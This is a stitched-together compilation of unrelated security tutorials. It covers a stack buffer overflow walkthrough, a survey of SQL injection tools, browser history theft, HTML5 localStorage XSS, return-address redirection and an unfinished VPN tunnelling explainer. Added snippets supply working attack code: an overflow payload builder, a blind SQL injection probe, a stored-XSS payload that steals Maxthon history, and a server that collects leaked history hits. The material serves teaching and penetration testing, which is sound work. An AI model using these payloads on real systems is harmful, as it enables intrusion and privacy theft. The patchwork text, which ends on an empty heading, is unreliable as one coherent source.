Now, let’s run this program normally. We can see that our program runs perfectly and asks us to “Enter the name”. When we enter the name and hit the enter key, it accepts the value without crashing the program, as the input string is shorter than the size of the buffer we have created. Now, let us run the program again in the same manner, but this time we will enter a value which is greater in size than the buffer size. For this we enter 35 A’s, and the program throws an error and crashes. We can see the same in the below screenshot. If we click on “click here” in the window shown in the above screenshot, we can see the following type of window on the screen. By looking closely into the red box, we can see the offset is written as ‘41414141’, and 41 is the hexadecimal representation of A. This clearly indicates that the program is vulnerable to buffer overflow.

Note: In many cases, an application crash does not lead to exploitation, but sometimes it does.

So, let us open the program with the debugger and create a breakpoint just before the function ‘V1’ is called, and note down the return address. The return address is the address of the next instruction after the call in the calling function. We can see the same in the below screenshot. (We have already covered all the basics in previous articles, so we are not going to discuss them in detail again.) We can create the breakpoint by selecting the address and pressing the F2 key. Run the program by hitting the F9 key and then press F7, which is Step Into. This means we have created a breakpoint before the V1 function call; after that the function ‘V1’ is called and execution control switches to the V1 function, and the top of the stack now points to the return address into the main function, which can be seen in the screenshot given below. Now, we will note down the position of the stored return address on the stack as well as the address itself from the top of the stack, which is the following.
Table 1
Position of the return address on the stack: 0022FF5C
Stored return address (to the main program): 004013FC

We will overwrite this return address with the user input data in the next step of the article. If we look at the program screen, we can see that ‘Main Function is called’ is being shown on the screen. Now, hit Step Over until we reach the ‘gets’ function. This can be done by pressing the F8 key. As can be seen in the above screenshot, we have reached the gets function and the program has continued to run. When we look at the program screen, we can see the program is asking us to enter the name, so enter the name and hit the enter key. As can be seen, when we enter the name and hit the enter key, execution control moves to the next instruction and the program again reaches the paused state. Now, hit Step Over (F8 key) until we reach the RETN instruction. If we look into window 4 now, we can see that the top of the stack is pointing to the return address, which is the following.

Table 2
Position of the return address on the stack: 0022FF5C
Stored return address (to the main program): 004013FC

Now, we have to compare the addresses of Table 1 and Table 2. So far nothing has caused any change in the tables we created, as we did not input anything wrong into the program. So, let us restart the program, input a very long string value into the program input, and analyze the return address when the program execution reaches the RETN instruction. We can restart the program by pressing CTRL+F2 and input 35 A’s into the program. As can be seen in the above screenshot, we have entered a very long input value in the program; now hit the F8 key (Step Over) until we reach the RETN instruction. Now, we will create another table and note down the top-of-the-stack values in the table.

Table 3
Position of the return address on the stack: 0022FF5C
Stored return address (to the main program): 41414141

If we compare the Table 2 and Table 3 addresses, we can see the return address to the main program has been replaced with 41414141 in Table 3. 41 is the ASCII hex value of A, so we can see the return address has been overwritten by the user input value A. Now think: what if we could modify the input value at this position and write some different address which points to a location in memory that contains our own piece of code? In this way, we can actually change the program flow and make it execute something different. The code that we want to execute after controlling the flow is often referred to as a “SHELLCODE”. We will discuss shellcode in later articles.

But the string that we have entered contains 35 A’s, and we do not know which ones have overwritten the return address on the stack. We will have to identify the positions in the user input where the stack is overwritten in memory. We can do this by entering some pattern instead of A’s. The input pattern could be anything. We will use the following pattern:

A1B2C3D4E5F6G7H8I9J0K1L2M3N4O5P6Q7U8S9T0U1V2W3X4Y5Z6

In this article, we have created this pattern manually, but in further articles we will use automated Metasploit scripts to generate the pattern. Now, we need to restart the program again in the debugger and enter the above pattern as input to the program we created. As can be seen in the above screenshot, we have entered the pattern when the program asked for the input. Now, press F8 (Step Over) until we reach the RETN instruction.
As we can see in the screenshot, we have reached the RETN instruction (screen 1), and the Top of the Stack has been overwritten by the user input and is pointing to the value "O5P6". So, these 4 bytes of the user input are the ones that land in the return address. Let us verify this by replacing "O5P6" with "BBBB" in our pattern before entering the input. According to our logic, the return address should then point to "BBBB" in memory when we reach the RETN instruction. As can be seen in the above screenshot, our B's have been successfully written at the position where the return address is stored. So, if we change our B's to an address somewhere else in memory, program execution will go to that address and execute the instruction found there. In this way, we can control the program flow and run our own code just by manipulating the input data.

So we have understood the following things by completing this exercise:

Finding and Analyzing Buffer Overflow
Overwriting Stack by User Input Data
Identifying the Return Address Position in User Input

References

https://www.owasp.org/index.php/Buffer_overflow_attack
http://en.wikipedia.org/wiki/C_file_input/output
http://www.exploit-db.com/
http://www.pentesteracademy.com/
https://www.corelan.be/

Source
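A small follow-up to the exercise above: once the offset of the saved return address is known (28 bytes for this binary, going by where O5P6 sits in the pattern), the replacement input can be assembled programmatically instead of editing the pattern by hand. This is a minimal sketch; the 0x42424242 value is simply "BBBB" from the verification step, and on this 32-bit target the four bytes are packed little-endian.

import struct

OFFSET = 28          # bytes of filler before the saved return address (from the pattern test)
ret = 0x42424242     # "BBBB" for the verification step; later, an address of our choosing

payload = b"A" * OFFSET + struct.pack("<I", ret)

# Write the input to a file so it can be pasted or redirected into the program's stdin.
with open("crash_input.txt", "wb") as f:
    f.write(payload + b"\n")

print(payload)

Swapping ret for a real instruction address is exactly the step that later articles build on when shellcode is introduced.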
-
BSQL Hacker BSQL hacker is a nice SQL injection tool that helps you perform a SQL injection attack against web applications. This tool is for those who want an automatic SQL injection tool. It is especially made for Blind SQL injection. This tool is fast and performs a multi-threaded attack for better and faster results. It supports 4 different kinds of SQL injection attacks: Blind SQL Injection Time Based Blind SQL Injection Deep Blind (based on advanced time delays) SQL Injection Error Based SQL Injection This tool works in automatic mode and can extract most of the information from the database. It comes in both GUI and console support. You can try any of the given UI modes. From GUI mode, you can also save or load saved attack data. It supports multiple injection points including query string, HTTP headers, POST, and cookies. It supports a proxy to perform the attack. It can also use the default authentication details to login into web accounts and perform the attack from the given account. It supports SSL protected URLs, and can also be used on SSL URLs with invalid certificates. BSQL Hacker SQL injection tool supports MSSQL, ORACLE and MySQL. But MySQL support is experimental and is not as effective on this database server as it is for other two. Download BSQL Hacker here: Download SQLmap SQLMap is the open source SQL injection tool and most popular among all SQL injection tools available. This tool makes it easy to exploit the SQL injection vulnerability of a web application and take over the database server. It comes with a powerful detection engine which can easily detect most of the SQL injection related vulnerabilities. It supports a wide range of database servers, including MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB and HSQLDB. Most of the popular database servers are already included. It also supports various kind of SQL injection attacks, including boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band. One good feature of the tool is that it comes with a built-in password hash recognition system. It helps in identifying the password hash and then cracking the password by performing a dictionary attack. This tool allows you to download or upload any file from the database server when the db server is MySQL, PostgreSQL or Microsoft SQL Server. And only for these three database servers, it also allows you to execute arbitrary commands and retrieve their standard output on the database server. After connecting to a database server, this tool also lets you search for specific database name, specific tables or for specific columns in the whole database server. This is a very useful feature when you want to search for a specific column but the database server is huge and contains too many databases and tables. Download SQL Map from the link given below: https://github.com/sqlmapproject/sqlmap SQLninja SQLninja is a SQL injection tool that exploits web applications that use a SQL server as a database server. This tool may not find the injection place at first. But if it is discovered, it can easily automate the exploitation process and extract the information from the database server. This tool can add remote shots in the registry of the database server OS to disable data execution prevention. The overall aim of the tool is to allow the attacker to gain remote access to a SQL database server. 
It can also be integrated with Metasploit to get GUI access to the remote database. It also supports direct and reverse bindshell, both TCP and UDP. This tool is not available for Windows platforms. It is only available for Linux, FreeBSD, Mac OS X and iOS operating systems. Download SQLninja from the link given below: http://sqlninja.sourceforge.net/ Safe3 SQL Injector Safe3 SQL injector is another powerful but easy to use SQL injection tool. Like other SQL injection tools, it also makes the SQL injection process automatic and helps attackers in gaining the access to a remote SQL server by exploiting the SQL injection vulnerability. It has a powerful AI system which easily recognizes the database server, injection type and best way to exploit the vulnerability. It supports both HTTP and HTTPS websites. You can perform SQL injection via GET, POST or cookies. It also supports authentication (Basic, Digest, NTLM HTTP authentications) to perform a SQL injection attack. The tool supports wide range of database servers including MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB database management systems. For MYSQL and MS SQL, it also supports read, list or write any file from the database server. It also lets attackers execute arbitrary commands and retrieve their output on a database server in Oracle and Microsoft SQL server. It also support web path guess, MD5 crack, domain query and full SQL injection scan. Download Safe3 SQL injector tool from the link given below: http://sourceforge.net/projects/safe3si/ SQLSus SQLSus is another open source SQL injection tool and is basically a MySQL injection and takeover tool. This tool is written in Perl and you can extend the functions by adding your own codes. This tool offers a command interface which lets you inject your own SQL queries and perform SQL injection attacks. This tool claims to be fast and efficient. It claims to use a powerful blind injection attack algorithm to maximize the data gathered. For better results, it also uses stacked subqueries. To make the process even faster, it has multi-threading to perform attacks in multiple threads. Like other available SQL injection tools, it also supports HTTPS. It can perform attacks via both GET and POST. It also supports, cookies, socks proxy, HTTP authentication, and binary data retrieving. If the access to information_schema is not possible or table does not exist, it can perform a bruteforce attack to guess the name of the table. With this tool, you can also clone a database, table, or column into a local SQLite database, and continue over different sessions. If you want to use a SQL injection tool against a MySQL attack, you will prefer this tool because it is specialized for this specific database server. Download SQLsus from the link given below: http://sqlsus.sourceforge.net/ Mole Mole or (The Mole) is an automatic SQL injection tool available for free. This is an open source project hosted on Sourceforge. You only need to find the vulnerable URL and then pass it in the tool. This tool can detect the vulnerability from the given URL by using Union based or Boolean based query techniques. This tool offers a command line interface, but the interface is easy to use. It also offers auto-completion on both commands and command arguments. So, you can easily use this tool. Mole supports MySQL, MsSQL and Postgres database servers. So, you can only perform SQL injection attacks against these databases. 
This tool is written in Python and requires only Python 3 and python3-lxml. It also supports GET, POST and cookie-based attacks. However, it is command driven: you need to learn its commands to operate it. The commands are not complicated, but you do need to know them; whether you keep a list handy or memorize them is up to you. Download the Mole SQL injection tool from the link below: http://sourceforge.net/projects/themole/files/ Source
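As a footnote to the tool list above: the boolean-based blind technique that most of these tools automate boils down to sending a pair of always-true/always-false conditions and comparing the responses. Below is a minimal sketch of that idea using the third-party requests library; the URL, parameter name and payloads are purely hypothetical and only meant for a target you are authorised to test.

import requests

# Hypothetical injectable endpoint and parameter: replace with an authorised test target.
URL = "http://testsite.example/item.php"
PARAM = "id"
BASE = "1"

def fetch(value):
    """Request the page with the given parameter value and return the body."""
    return requests.get(URL, params={PARAM: value}, timeout=10).text

def looks_injectable():
    """Compare responses for an always-true and an always-false condition.
    If the true case matches the baseline while the false case differs,
    the parameter is a candidate for boolean-based blind injection."""
    baseline = fetch(BASE)
    true_case = fetch(BASE + "' AND '1'='1")
    false_case = fetch(BASE + "' AND '1'='2")
    return true_case == baseline and false_case != baseline

if __name__ == "__main__":
    if looks_injectable():
        print("Possible boolean-based blind injection point")
    else:
        print("No obvious difference between true/false responses")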
-
Exploiting Same Origin with Browser History

Browser history attacks leak sensitive information about other origins: they allow you to determine which origins the user has been visiting. In a legacy browser, a browser history attack typically involved simply checking the color of links (blue) written to the page. You will briefly explore using CSS colors, but today's latest browsers have been patched, so you won't find this type of attack working any more. This article describes the attack methods that are currently the most effective for revealing browser history information across a range of browsers. A few examples of lesser-known browsers vulnerable to these history-stealing vulnerabilities, such as the Avant and Maxthon browsers, will also be explored.

Using CSS Colors

In earlier days, stealing browser history using CSS was easy. The attack was performed by abusing the :visited CSS selector. The technique was very simple but very effective. Take for example the following code:

<a id="site_1" href="http://httpsecure.org">link</a>

The CSS :visited selector could be used to check whether the target had visited the link above (and therefore whether it was present in the browser history), with a rule looking similar to this:

#site_1:visited { background: url(/httpsecure.org?site=securityflaw); }

In the above code the background selector is used, but you can use any selector in which a URI can be specified. If httpsecure.org is present in the browser's history, a GET request to httpsecure.org?site=securityflaw will be submitted.

Jeremiah Grossman found a similar exploitation technique in 2006 that also relied on checking the color of a link element. In most browsers, the default behavior when a link had already been visited was to change the color of the link text from blue to violet; if the link had not been visited, it kept its default color (blue). In Grossman's original proof of concept, the :visited style was overridden with a custom style/color (such as pink). A script was then used to dynamically generate links on the page, potentially hidden from the user, and their computed color was compared with the previously overridden pink. If a match was found, the attacker would know that the site was present in the browser history. Consider the following example:

<html>
<head>
<style>
#link:visited {color: #FF1493;}
</style>
</head>
<body>
<a id="link" href="http://httpsecure.org" target="_blank">clickhere</a>
<script>
var link = document.getElementById("link");
var color = document.defaultView.getComputedStyle(link, null).getPropertyValue("color");
console.log(color);
</script>
</body>
</html>

If the link was already visited by the user, and if the browser is vulnerable to this issue, the output in the console log would be rgb(255, 20, 147), which corresponds to the pink color overridden in the CSS. If you run the above snippet in Firefox (which is already patched against this attack), it will always return rgb(0, 0, 238). Nowadays, most modern browsers have patched this behavior; Firefox, for example, patched this technique in 2010.

Using Cache Timing

Felten and Schneider wrote the first white paper on the topic of cache timing attacks in 2000. The paper, titled "Timing Attacks on Web Privacy", was mainly focused on measuring the time required to access a resource with and without browser caching. Using this information, it was quite possible to deduce whether the resource had already been retrieved (and cached).
The limitation of this attack was that querying the browser cache during the initial test also tainted it. Michal Zalewski found another, completely non-destructive way to extract browser history using the previously mentioned cache-timing technique. Zalewski's approach consists of loading resources in iframes, trapping Same Origin Policy violations, and preventing the alteration of the cache. Iframes are convenient here because the Same Origin Policy is enforced and you can prevent the iframe from fully loading the resource, which stops it from being written into the local cache. The cache stays untouched, as short timings are used when loading and unloading resources. As soon as it can be ascertained that there is a cache miss on a particular resource, the iframe loading is stopped. This behavior allows testing the same resource again at a later stage. The most effective resources to target using this technique are JavaScript or CSS files, because they are often cached by the browser and are always loaded when browsing to a target application. These resources are loaded in iframes, and they should not include any framebusting logic, such as X-Frame-Options (other than Allow).

Mansour Behabadi found a different technique that relies on loading images instead. The technique currently works only on WebKit- and Gecko-based browsers. When your browser has cached an image, it usually takes less than 10 milliseconds to load it from the cache. If the image is not found in the browser cache, it is fetched from the server, and the time taken depends on the image size and the connection speed. Using this timing information, you can determine whether a target's browser has previously visited a given website.

Note: You can read the full source code of this technique on https://browserhacker.com, or on the Wiley website at www.wiley.com/go/browserhackershandbook, where the original three PoCs have been modified and merged into a single code snippet. Just remember that an additional limitation of this technique is that the resource you want to find, for example http://httpsecure.org/images/arrow.png, might have been moved temporarily or permanently by the time you are reading this article. This is already the case for some of the resources used in the original PoC by Zalewski. Both of these techniques rely on specific and short timings when reading from the cache, so they are both very sensitive to machine performance. The same applies to the second technique, where the timing is "hard-coded" to 10 milliseconds: for example, if you are playing an HD video on Vimeo while your machine is heavily using CPU and IO, the accuracy of the results may decrease.

Using Browser APIs

Avant is a lesser-known browser that can swap between the Trident, Gecko and WebKit rendering engines. Roberto Suggi Liverani found an attack for bypassing the Same Origin Policy using specific browser API calls in the Avant browser prior to 2012 (build 28).
Let's consider the following code that demonstrates this issue:

var av_if = document.createElement("iframe");
av_if.setAttribute('src', "browser:home");
av_if.setAttribute('name','av_if');
av_if.setAttribute('width','0');
av_if.setAttribute('heigth','0');
av_if.setAttribute('scrolling','no');
document.body.appendChild(av_if);
var vstr = {value: ""};
//This works if Firefox is the rendering engine
window['av_if'].navigator.AFRunCommand(60003, vstr);
alert(vstr.value);

The above code snippet loads the privileged browser:home address into an iframe, and then executes the function AFRunCommand() from its own navigator object. This function is an undocumented, proprietary API that Avant added to the DOM. Liverani brute-forced some of the integer values that can be passed as the first parameter to the function. He found that by passing the value 60003 and a JSON object to the AFRunCommand() function, he was able to retrieve the victim's full browser history. This is clearly a Same Origin Policy bypass, because code running on an origin such as http://httpsecure.org should not be able to read the contents of a higher-privileged zone like browser:home. Executing the previous code snippet results in a pop-up containing the browser history.

A similar issue has been found in Maxthon 3.4.5 (build 2000). Maxthon is another lesser-known web browser. Roberto Suggi Liverani discovered that the content rendered in the about:history page does not have effective output escaping, and this can be exploited. If an attacker forces a victim to open a malicious link, this injection will persist in the history page until the history is cleared:

http://example.com/issue/hacked.html#" onload='prompt(1)'<!--

This code will execute every time the victim checks the browser history, and the JavaScript executes in the privileged zone. The about:history page happens to be mapped to a custom Maxthon resource at mx://res/history/index.htm. Injecting code into this context allows you to steal all the history contents, which are held in the element with id history-list:

links = document.getElementById('history-list')
    .getElementsByTagName('a');
result = "";
for(var i=0; i<links.length; i++) {
    if(links[i].target == "_blank"){
        result += links[i].href+"\n";
    }
}
alert(result);

This payload can be packaged and delivered with the following link:

http://example.com/issue/hacked.html#" onload='links=document.
getElementById("history-list").getElementsByTagName("a");
result="";for(i=0;i<links.length;i++){if(links[i].target=="_blank")
{result+=links[i].href+"\n";}}prompt(result);'<!--

The cross-content scripting vulnerability is stored, so after the malicious content is loaded into the history page the first time, the code will execute every time the user revisits their history. In a real attack it would be necessary to replace the prompt() function with one of the hooking techniques, so that the browser history can be sent to the attacker's server.

Reference

https://browserhacker.com/

Source
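To round off the CSS :visited technique described at the start of this article: when the visited rule fires, the browser fetches the background URL, so the attacker's side of the "detection" is nothing more than logging which query strings arrive. Below is a minimal sketch of such a collector using Python's standard http.server; the port and the site parameter name are arbitrary choices for illustration.

from http.server import HTTPServer, BaseHTTPRequestHandler
from urllib.parse import urlparse, parse_qs

class ProbeLogger(BaseHTTPRequestHandler):
    def do_GET(self):
        # The :visited background rule requests something like /probe?site=securityflaw;
        # record the parameter to learn which link was present in the victim's history.
        query = parse_qs(urlparse(self.path).query)
        if "site" in query:
            print("History hit reported:", query["site"][0])
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.end_headers()
        self.wfile.write(b"GIF89a")  # tiny placeholder body

    def log_message(self, fmt, *args):
        pass  # keep console output limited to the history hits

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8000), ProbeLogger).serve_forever()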
-
In a previous article of mine, I discussed Cross Domain Messaging in HTML5. This article walks you through another feature, called local storage, and its security.

Local Storage

Local storage is one of the new features added in HTML5. It was first introduced in Mozilla 1.5 and eventually embraced by the HTML5 specification. We can use the local storage feature in HTML5 through the JavaScript objects localStorage and sessionStorage. These objects allow us to store, retrieve and delete data based on name/value pairs. Data stored through the localStorage object persists through browser shutdowns, while data created using the sessionStorage object is cleared at the end of the current browsing session. One important point to note is that this storage is origin-specific: a site from a different origin cannot access the data stored in an application's local database. Let me make it clear with a simple example.

Below is a sample HTML5 application which is capable of storing data using the local storage feature. We can also retrieve the data stored in the database using the "Show Data" button. Let us first observe the origin of this site. Let us assume that this is "Application A".

http://localhost:8383/

So here are the details:
Name: Application A
Origin: http://localhost:8383/

Let us click the Show Data button. We are able to access the data stored by this application in the database. That is expected. Now, let us try to access this data stored by Application A from a different origin. Let us assume that this is Application B. Here are the details:
Name: Application B
Origin: http://localhost/

Please note that the port number is different from Application A. Let us click the "Show Data" button. When I clicked "Show Data", nothing was displayed on the web page. This is because this application is running on a different origin. Just to confirm, let us run a different application named "Application C" from the same origin as Application A. Here are the details:
Name: Application C
Origin: http://localhost:8383/

Let us click "Show Data" and observe the result. Nice! We are able to access the data from this application, since it is from the same origin as Application A. To conclude, I have used the same code in all the above examples but with different origins. We inserted data into the database using Application A. When we tried accessing it from Application B, it failed due to the Same Origin Policy. Let us now see some attacks possible with HTML5 local storage.

Storing Sensitive Data

Developers may store sensitive information in these databases. Because APIs are stateless, it is common to find API keys or similar sensitive data stored on the client when working with them. Even without physical access to the device, this data can be stolen through an XSS vulnerability. Below is an example of how JavaScript's localStorage object stores data. We can use the function setItem with a name/value pair as parameters.

localStorage.setItem("data", "mydata");

As we can see in the figure below, Chrome stores this data in the following path. We can programmatically read this data using JavaScript as shown below.

localStorage.getItem("data");

We can now go ahead and read this data from the SQLite database as shown below.

Script Injection

Stored data, when not properly sanitized, may lead to script injection attacks. Let us see a simple example. Below is the same form we saw in the beginning of the article. Let us store some sample data and retrieve it back as shown below.
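A brief aside on reading that data from disk: at the time of writing, Chrome kept localStorage in one SQLite file per origin under the profile's "Local Storage" directory, conventionally with a table named ItemTable holding UTF-16 encoded values. Assuming that layout (the file name below is a placeholder based on older Chrome builds), the stored pair can be dumped with a few lines of Python:

import sqlite3

# Placeholder path: the real file lives in the browser profile, e.g. something like
# ".../Local Storage/http_localhost_8383.localstorage" in older Chrome builds.
DB_PATH = "http_localhost_8383.localstorage"

conn = sqlite3.connect(DB_PATH)
try:
    # ItemTable(key, value) is the layout used by older Chrome versions;
    # values are stored as UTF-16LE blobs, hence the decode below.
    for key, value in conn.execute("SELECT key, value FROM ItemTable"):
        print(key, "=", bytes(value).decode("utf-16-le", errors="replace"))
finally:
    conn.close()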
If this data is not properly sanitized, it will lead to a stored XSS vulnerability, as shown below. This time, let us enter the below piece of code into the message box.

<img src='X' onerror=alert(1);>

Let us click the "Show Data" button and see the result. As we can see, an alert box has popped up due to the JavaScript we injected.

Conclusion

This article has discussed how the HTML5 local storage feature works and how Same Origin Policy restrictions are applied to the data being stored. Finally, we have had a look at some possible attacks on the HTML5 local storage feature. We will see other HTML5 features and possible attacks in later articles.

Source
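As a closing note on the stored XSS above: the underlying fix is output encoding before the stored value is echoed back (in a PHP application, htmlspecialchars() would do this). Purely as an illustration of the idea, here is the equivalent encoding step sketched in Python:

import html

def render_user_value(raw):
    """Encode HTML metacharacters so stored input is displayed as text,
    not interpreted as markup."""
    return "You Entered: " + html.escape(raw, quote=True)

if __name__ == "__main__":
    payload = "<img src='X' onerror=alert(1);>"
    print(render_user_value(payload))
    # -> You Entered: &lt;img src=&#x27;X&#x27; onerror=alert(1);&gt;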
-
In the previous article, we learned about the basics of the Stack Based Buffer Overflow, such as analyzing the stack, creating breakpoints and analyzing the function call and registers. With the help of these skills, we will now see how we can manipulate the return addresses dynamically into the program. We will analyze a program in which a function ‘do_not_call’ is defined but has never been called throughout the program. So, our goal is to change the register address in a way so that this function is called and performs the operation which is given in the function. We will perform this task by manipulating the register addresses while the program is running. Let’s take a look at the program. We have already given the source code and the binary file of the program in the end of the article. You can download it here: Download As can be seen in the above screenshot, we have mentioned a number for each function. The description for the same is given below. First of all, we have created a function “do_not_call” which prints the message “Function do_not_call is called” by the printf command. This is another function. The name of this function is ‘function1?, which has the integer return type with one argument. In the next line we have created a local variable. This function prints the message “function1 is called”. This is the main function of the program. The program execution will begin with this function. First, we gave a command to print the message “Main function is called”, and in the next step we initialized the local variable. In the next line, we have called the ‘function1?. You must have noticed that we have not called the “do_not_call” function in our program. Let us verify it by running the program normally. As we can see in the above screenshot, when we run the program normally, it prints two messages, ‘Main Function is called’ and ‘Function1 is called’. Now, we will open the program in Immunity Debugger. After opening the program with Immunity Debugger, we can see four different screens. Each screen is showing a different kind of program data. If we scroll down the first screen we can see all assembly language instructions as well as the strings we have used in the program. You can see the same in the screenshot given below. As can be seen in the above screenshot, the main function starts by pushing the EBP resister into the memory and ends at the RETN instruction. For a better understanding, we have created a table in which we have the starting and ending address of all the functions defined in our program. Function Name Function Starting Address Function Ending Address Main Function 004013C4 00401416 Function 1 004013A4 004013C4 Do_not_call 00401390 004013A3 Now we will make a list of all the function calls taking place in the program. After analyzing the main program, we can see the following function calls: After taking a close look at the above screenshot, we find that there are four function calls in the main program. If we closely look at the functions which are being called, then in the fourth function call, we can see that it is calling to ‘Second.004013A4? in which the last 8 digit address is actually the starting address of ‘function1?. We can verify the same by checking the table we have created above. In simple terms, this statement is calling function1 as we have defined in the program source code. Now, we will create a break point to analyze the Stack, Return Addresses, etc. 
(We have already mentioned all the basics in the previous article, like what is a breakpoint and how do we create a breakpoint in the debugger, etc., so we are not going to cover this again in this article.) The following steps are mentioned below to further analysis. Create the breakpoint before the 4th function call. We can do this by clicking on the instruction and hitting the F2 key, after that run the program. We can run the program by pressing F9. Now, we can see the following screen in the debugger. As of now, the program execution control has reached that position where we have created the breakpoint. In screen 1, we have created the breakpoint on “00401401” and now the program has paused on this instruction. We can see in screen 2 the EIP register is pointing to the address at which we have created the breakpoint. Now we will execute the instructions step by step for understanding the concept more clearly. Let us execute the next instruction; we can do this by pressing the F7 key, which is Step into. As we can see, execution control is pointing to the next instruction in screen 1 and EIP is also pointing to the instruction address. Now, the execution control would go to address “004013A4? which is the starting address of the function1. We will now execute it and see what changes we come across. Again hit the F7 key to execute the next instruction. We get the following output screen. This step is very critical and important to understand. As can be seen in the above screenshot, the execution pointer has switched from 00401408 (No-1) to 004013A4 (No-2) which is the starting point of ‘function1?. Also, when we take a look at screen 4 we see that the Top of the Stack (No-3) is pointing the address 0040140D (No-4), which is the next instruction from the function call. This address is also called the return address to the main program. It means that after the execution of ‘function1? is complete, then the execution control would switch to this address. If we change this return address, we can actually change the order of execution of the program. So, let us change the return address in the debugger with the address of the ‘do_not_call’ function address which was in the above table. The function “do_not_call” address is: “00401390” To change the address, we will have to right click on the address and click on modify. After that, change the Hexadecimal value and then click on OK. Now, we can see our changes are reflected on screen 4. The top of the stack is pointing to the address of the ‘do_not_call’ function. This will allow us to execute the ‘do_not_call’ function, which was not supposed to be executed in the actual program. Now, we will execute each instruction step by step until we reach the RETN instruction. As we can see, program execution control has reached the RETN instruction. It means the function1 execution has completed and now the execution control will go to the main program (according to our program), but we had changed the return address in the previous step to the function ‘do_not_call’, so the execution control will go to the ‘do_not_call’ function and execute the instruction that it is defined to execute. So, let us execute next instruction step by step and we will see the ‘do_not_call’ function has successfully executed. We can verify the same by checking the output of the program. As can be seen in the above screenshot, by dynamically changing the return address of the program, we are successfully able to execute the function the program was not supposed to execute. 
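One detail worth making explicit, because it matters as soon as the same redirection is done through program input rather than through the debugger: on this 32-bit x86 target, the saved return address sits on the stack in little-endian byte order. Here is a small illustrative sketch using the do_not_call address from the table above:

import struct

DO_NOT_CALL = 0x00401390   # starting address of do_not_call, taken from the table above

# How those four bytes would have to appear in memory (little-endian)
# in order to become the saved return address.
as_stack_bytes = struct.pack("<I", DO_NOT_CALL)
print(as_stack_bytes.hex())                                   # 90134000
print(struct.unpack("<I", as_stack_bytes)[0] == DO_NOT_CALL)  # True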
So in this article we have learned… Monitoring and Analyzing the Register Value Analyzing Top of Stacks Changing the Return Address References https://www.owasp.org/index.php/Buffer_overflow_attack http://en.wikipedia.org/wiki/C_file_input/output http://www.exploit-db.com/ http://www.pentesteracademy.com/ Source
-
1. Introduction

The idea of a Virtual Private Network (VPN) is to simulate a private network over a public network. A VPN tunnel can be used to securely connect LANs of the company over the insecure Internet (the VPN gateways are responsible for making the connection secure). This article describes how tunneling and cryptography can be used to build VPN tunnels, without going into the details of existing VPN protocols.

2. TCP/IP model and encapsulation

One needs to understand these topics before tunneling is discussed. There are four layers in the TCP/IP model:

Layer 4: Application layer
Layer 3: Transport layer
Layer 2: Internet layer
Layer 1: Network access layer

From the point of view of the sender, the data goes through layers 4 -> 1 (1 -> 4 from the perspective of the receiver). The L4PDU (Layer 4 Protocol Data Unit) is sent from the application layer to the transport layer. A TCP header is appended to the L4PDU and the L3PDU (Layer 3 Protocol Data Unit) is created; the L3PDU is called a segment. Then the L3PDU is sent from the transport layer to the Internet layer. An IP header is appended to the L3PDU and the L2PDU (Layer 2 Protocol Data Unit) is created; the L2PDU is called a datagram. This simplified description shows that the L3PDU (segment) becomes a part of the L2PDU (datagram). In fact, the segment is included in the datagram, and this inclusion is called encapsulation. Then the datagram is appended with another header and the L1PDU (Layer 1 Protocol Data Unit) is created; the L1PDU is called a frame. Finally, the frame is sent over the transmission medium in the form of zeros and ones. From the perspective of the receiver, the exact reverse process occurs (layers 1 -> 4) and is called four-step decapsulation.

3. VPN tunnel

Normally the data of the application layer is encapsulated into the segment of the transport layer, which is further encapsulated into the datagram of the Internet layer. Then the frame of the network access layer encapsulates the datagram, and finally the bits are transferred over a physical medium. In a VPN tunnel, one datagram (the internal one) is encapsulated in another datagram (the external one). This encapsulation is used to carry private addresses through the tunnel. We want to carry private IP addresses through the tunnel because the goal is to connect local area networks (LANs) at both ends of it. That's why the external IP (the one which is not tunneled) is a public address used to reach the VPN gateway, and the internal IP (the one which is tunneled) is a private address.

Let's analyze a real-world analogy of tunneling to better understand how it works. A car wants to travel from city C1 to city C2, and these cities are separated by a river. The car is loaded onto a ship and transported from C1 to C2. This is exactly how tunneling works: the internal datagram is carried inside another datagram that reaches the VPN gateway. There the internal datagram is extracted and can be sent on to another host. Although private addresses are not routable on the Internet, they can traverse it using this approach. There is one thing missing: we need to make the tunneling secure, and cryptography is used for this purpose.

4. Using crypto to secure the tunnel

The intention of this part of the article is to present briefly how crypto can be applied to make the tunnel secure, without going into cryptographic details. First of all, we want authentication. Digital certificates can be used for this purpose.
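Before moving on to the cryptography, here is a toy sketch to make the encapsulation idea from the previous sections concrete. It uses plain Python data structures rather than real packet crafting, and the IP addresses are arbitrary examples: the inner datagram keeps the private LAN addresses, while the outer datagram carries the public addresses of the two VPN gateways.

def encapsulate(payload, header):
    """Wrap a payload in a header, mirroring how each layer prepends its own header."""
    return {"header": header, "payload": payload}

# Normal (non-tunneled) encapsulation: data -> segment -> datagram -> frame
data = "application data"
segment = encapsulate(data, {"proto": "TCP", "dst_port": 80})
datagram = encapsulate(segment, {"proto": "IP", "src": "192.168.1.10", "dst": "192.168.2.20"})
frame = encapsulate(datagram, {"proto": "Ethernet"})

# VPN tunnel: the inner datagram keeps the private LAN addresses, while the outer
# datagram uses the public addresses of the two VPN gateways.
inner = encapsulate(segment, {"proto": "IP", "src": "192.168.1.10", "dst": "192.168.2.20"})
outer = encapsulate(inner, {"proto": "IP", "src": "203.0.113.1", "dst": "198.51.100.1"})

print(frame)
print(outer)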
Moreover, the communication should be confidential, so that unauthorized users cannot read it. Confidentiality is achieved with symmetric encryption. Before symmetric encryption can happen, the symmetric key needs to be distributed securely, and asymmetric encryption is used for this key distribution. Let's assume that A is communicating with B. The symmetric key is generated by A, encrypted with the public key of B and sent to B. Only B can decrypt it, because B is the only one that holds the corresponding private key.

In addition to this, we want to be sure that the communication has not been modified. An HMAC is used for this purpose (a hash over the message sent and the symmetric key). The symmetric key can be regenerated periodically; it is then called a session key (randomly generated and valid only for one session). If an attacker learns the session key, he can only decipher the messages sent after the last regeneration of the key and before the next one. This is how Forward Secrecy is achieved. As far as symmetric encryption is concerned, an encryption mode is needed that changes the ciphertext in a random-looking way in order not to weaken the encryption key. The solution is the cipher block chaining (CBC) mode of encryption.

5. Summary

